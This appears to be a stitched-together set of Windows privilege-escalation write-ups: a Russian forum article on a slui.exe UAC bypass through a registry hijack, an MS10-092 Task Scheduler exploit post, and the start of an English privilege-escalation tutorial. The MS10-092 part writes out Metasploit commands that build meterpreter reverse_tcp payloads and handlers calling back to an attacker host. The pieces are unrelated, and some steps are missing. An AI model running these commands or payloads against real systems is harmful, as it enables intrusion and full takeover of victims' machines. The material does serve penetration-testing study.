Статья Windows LPE (Local Privilege Escalation [Bypas UAC 2018 slui.exe method] )
) — поднятия привилегий в системе Windows 8-10 x64 и x86 системах.
PS: Пишу сразу на двух форумах по этому :
CopyRights : MisterBert0ni aka DarkNode >>>
СОДЕРЖАНИЕ СТАТЬИ :
- Описания работы эксплоита
- Демонстрация работы эксплоита
- Вспомним про Web Delivery через PowerShell
- Вспомним про RegSVR способ подгрузки
- Похожие эксплоиты
ПРИНЦИП РАБОТЫ ЭКСПЛОЙТА:
В операционной системе Windows версии 8-10 был обнаружен бинарный файл slui.exe — который является auto-elevated приложением ,так сказать — самоповышаемым.
Это дает возможность использовать обработчик
й для хайджекинга в привилегированый процесс.
Простыми словамя говоря:
Мы создаем в реестре Windows запись , которая скажет что при открытии всех *.EXE файлов — будет выполнятся наша команда или вредоносный файл, после чего запускаем slui.exe , соответственно вместо slui.exe запустится наш пейлоад от имени администратора.
Для того чтобы понять как это работает давайте приступим к практической части:
1) Допустим у нас сессия без повышеных привилегий
3) После того как мы набросали список действий в наш скрипт — ложим где-то на вебсервер ( в моем случае в условиях учебной практике — это локальная машина )
И запускаем на стороне жертвы тем же Web Delivery методом в моем случае:
4) Ловим сессию с повышеными привилегиями
Всем спасибо) С вами был DarkNode
Работа regsvr32 вектора покажу в видео)
MS10-092 : Microsoft Windows Task Scheduler Privilege Escalation
Timeline :
webDEViL 0day release on Exploit-DB the 2010-11-20
Metasploit exploit released the 2010-11-20
PoC provided by :
Reference(s) :
Affected version(s) :
Should work on Vista/Win7/2008 x86/x64
Tested on Windows 7 Integral
Description :
Stuxnet is not yet inhume, on four discovered 0day, only three of them where patched by Microsoft during the October second Tuesday. The last one has been reveled by webDEViL the 21 October on Exploit-DB, and one day later, this new still unpatched 0day, has been integrated into Metasploit by Rapid7 team.
This vulnerability permit to a local unprivileged user to do a “privilege escalation” attack by running the Windows scheduler on Windows Vista, Seven and 2008.
Here under a video demonstrating the privilege escalation between an another 0day disclosed by Corelan Team on Foxit PDF Reader.
Commands :
Foxit PDF Reader exploitation
use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
Creating a test.exe containing a reverse_tcp meterpreter payload
sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.178.21 X test.exe
Launching a second multi handler listener with msfcli
sudo msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.178.21 E
Running schelevator to gain system privileges
Privilege Escalation in Windows
All roads lead to SYSTEM
Privilege Escalation may be daunting at first but it becomes easier once you know what to look for and what to ignore. Privilege escalation always comes down to proper enumeration. This guide will mostly focus on the common privilege escalation techniques and exploiting them.
The starting point for this tutorial is an unprivileged shell on a box. For demonstration purpose, I have used netcat to get a reverse shell from a Windows 7 x86 VM.
Enumeration
I cannot stress enough how important enumeration is. There are a lot of cheat sheets out there to extract valuable information from the systems. In this guide, I will focus on the scripts which are available and using them. Some of the popular scripts available are:
In my experience, winPEAS and PowerUp are the most useful tools. PowerUp is written in PowerShell and winPEAS is written in C#. You will require .NET Framework 4.0 to run winPEAS. There is also a .bat version of winPEAS which can be used if .NET support is not present. In my case .NET 4.0 was not installed by default on the Windows 7 so I had to install it to use winPEAS. Always run more than one script for enumeration just to be safe. For example, Weak Registry vulnerability was detected by winPEAS but not by PowerUp.
Privilege Escalation Techniques
Stored Credentials
Search the registry for usernames and passwords.
So now that you have found a password what do you do with it? If RDP is accessible and the user is in the Remote Desktop Users group then its great. Else you can use the below PowerShell script to run commands as that user.
If cmdkey /list returns entries, it means that you may able to runas certain user who stored his credentials in windows.
Windows Kernel Exploitation
If the OS is updated regularly then these exploit will not be of much help. You can use Watson to check for vulnerabilities due to missing patches. Watson is already integrated with winPEAS. In case you find any vulnerability you can download the same from the below repository. Make sure you download the correct architecture for your target. In case you need to compile the binary you can use Kali to cross-compile.
DLL Hijacking
A windows program looks for DLLs when it starts. If these DLL’s do not exist then it is possible to escalate privileges by placing a malicious DLL in the location where the application is looking for.
Generally, a Windows application will use pre-defined search paths to find DLL’s and it will check these paths in a specific order.
1. The directory from which the application loaded
2. 32-bit System directory (C:\Windows\System32)
3. 16-bit System directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. The current working directory (CWD)
6. Directories in the PATH environment variable (first system and then user)
As you can see that PowerUp has detected a potential DLL hijacking vulnerability. Usually, we write the malicious DLL using Write-HijackDll function of PowerUp and restart the program. When the program starts it loads the malicious DLL and executes our code with higher privilege.
In this case, a quick google search reveals https://github.com/itm4n/Ikeext-Privesc which can be used to exploit this vulnerability.
However, you can do this manually to understand the whole process of exploitation. You can refer to my post here.
Unquoted Service Paths
When a service is started Windows will search for the binary to execute. The location of the binary to be executed is declared in the binPath attribute. If the path to the binary is unquoted, Windows does not know where the binary is located and will search in all folders, from the beginning of the path.
So, if we want to exploit this misconfiguration, three conditions have to be met:
- The service path is unquoted;
- The service path contains space; and
- We have write permission in one of the intermediate folders.